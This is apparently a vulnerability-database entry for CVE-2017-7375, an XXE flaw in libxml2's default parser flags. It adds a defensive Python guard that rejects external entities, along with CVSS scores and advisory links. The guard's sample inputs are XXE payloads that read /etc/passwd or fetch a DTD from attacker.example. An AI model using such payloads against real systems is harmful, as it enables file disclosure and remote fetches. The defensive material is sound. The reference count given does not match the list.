CVE-2017-7375

CRITICAL

libxml2 <= 2.9.4 - XML External Entity Injection via Default Parser Flags

Title source: manual

Description

A flaw in libxml2 allows remote XML entity inclusion with default parser flags, that is, even when the caller did not request entity substitution (XML_PARSE_NOENT), DTD validation (XML_PARSE_DTDVALID), loading of the external DTD subset (XML_PARSE_DTDLOAD) or default DTD attributes (XML_PARSE_DTDATTR). An external parsed entity declared in the document's own DTD and referenced from element content was still loaded and parsed. Depending on the context, this exposes a higher-risk attack surface in libxml2 that is not usually reachable with default parser flags, and can disclose content from local files or from HTTP or FTP servers that might otherwise be unreachable (a classic XXE, CWE-611). The issue was fixed in libxml2 2.9.5.
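Because this bug bypasses the parser flags an application thought it had set, the practical mitigation is to reject DTD-driven external entity use before the document reaches a feature-rich parser at all. The following is an added example written for this entry, not libxml2 code and not taken from any of the referenced advisories: a pre-parse guard built on Python's standard-library expat binding that refuses any document declaring an external DTD subset or an external (SYSTEM/PUBLIC) general or parameter entity, and aborts if the parser ever attempts to fetch one. The sample documents, the hostname attacker.example and the function names are constructed for illustration.

```python
"""Added example (not libxml2 code): pre-parse XXE guard on top of expat.
It flags external DTD subsets and external general/parameter entity
declarations, and refuses to resolve any external entity reference, so the
decision does not depend on the downstream parser's default flags."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class ExternalEntityError(ValueError):
    """Raised when untrusted XML declares or references an external entity."""


def find_external_entities(data: bytes) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    parser = expat.ParserCreate()
    # Never read parameter entities or the external subset during the check.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # A DOCTYPE with a SYSTEM/PUBLIC identifier names an external subset.
        if system_id is not None or public_id is not None:
            findings.append(
                f"DOCTYPE {name} points at external subset {system_id or public_id}")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones carry an identifier.
        if system_id is not None or public_id is not None:
            kind = "parameter" if is_param else "general"
            findings.append(
                f"external {kind} entity {name!r} -> {system_id or public_id}")

    def on_external_ref(context, base, system_id, public_id):
        # Returning 0 makes expat abort the parse instead of fetching the entity.
        findings.append(f"reference to external entity {system_id or public_id}")
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref

    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        # Either our handler aborted the parse (already recorded above) or the
        # document is simply malformed; report the latter as well.
        if not findings:
            findings.append(f"not well-formed: {exc}")
    return findings


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse untrusted XML only after the guard found nothing to object to."""
    findings = find_external_entities(data)
    if findings:
        raise ExternalEntityError("; ".join(findings))
    return ET.fromstring(data)


# Constructed sample inputs (hypothetical, not taken from any real report).
SAFE_DOC = b'<?xml version="1.0"?><order><item sku="A1">2</item></order>'
XXE_DOC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           b'<order>&xxe;</order>')
PARAM_DOC = (b'<!DOCTYPE order [<!ENTITY % ext SYSTEM '
             b'"http://attacker.example/evil.dtd"> %ext;]><order/>')
EXT_SUBSET_DOC = b'<!DOCTYPE order SYSTEM "http://attacker.example/evil.dtd"><order/>'

if __name__ == "__main__":
    print(parse_untrusted(SAFE_DOC).tag)
    for doc in (XXE_DOC, PARAM_DOC, EXT_SUBSET_DOC):
        try:
            parse_untrusted(doc)
        except ExternalEntityError as err:
            print("rejected:", err)
```

The guard deliberately records the declaration as well as the reference, so a document that declares an external entity but never uses it is still rejected; for untrusted input there is no legitimate reason to carry one. For callers that must keep using libxml2 directly, the equivalent belt-and-braces is to install an entity loader that refuses everything (xmlSetExternalEntityLoader) and to pass XML_PARSE_NONET, in addition to upgrading past 2.9.4, since this CVE shows that the absence of XML_PARSE_NOENT and XML_PARSE_DTDLOAD was not by itself sufficient.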

References (8)

https://source.android.com/security/bulletin/2017-06-01  (Android Security Bulletin, June 2017: Patch, Third Party Advisory; x_refsource_confirm)
https://www.debian.org/security/2017/dsa-3952  (Debian DSA-3952: Third Party Advisory; vendor-advisory, x_refsource_debian)
http://www.securityfocus.com/bid/98877  (SecurityFocus BID 98877: Third Party Advisory, VDB Entry; vdb-entry, x_refsource_bid)
https://security.gentoo.org/glsa/201711-01  (Gentoo GLSA 201711-01: Third Party Advisory; vendor-advisory, x_refsource_gentoo)
https://bugzilla.redhat.com/show_bug.cgi?id=1462203  (Red Hat Bugzilla 1462203: Issue Tracking, Patch, Third Party Advisory; x_refsource_confirm)
http://www.securitytracker.com/id/1038623  (SecurityTracker 1038623: Third Party Advisory, VDB Entry; vdb-entry, x_refsource_sectrack)

Scores

CVSS v3 9.8
EPSS 0.0269
EPSS Percentile 84.0%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Details

CWE
CWE-611
Status published
Products (13)
debian/debian_linux 7.0
debian/debian_linux 8.0
debian/debian_linux 9.0
google/android 4.4.4
google/android 5.0.2
google/android 5.1.1
google/android 6.0
google/android 6.0.1
google/android 7.0
google/android 7.1.1
... and 3 more
Published Feb 19, 2018
Tracked Since Feb 18, 2026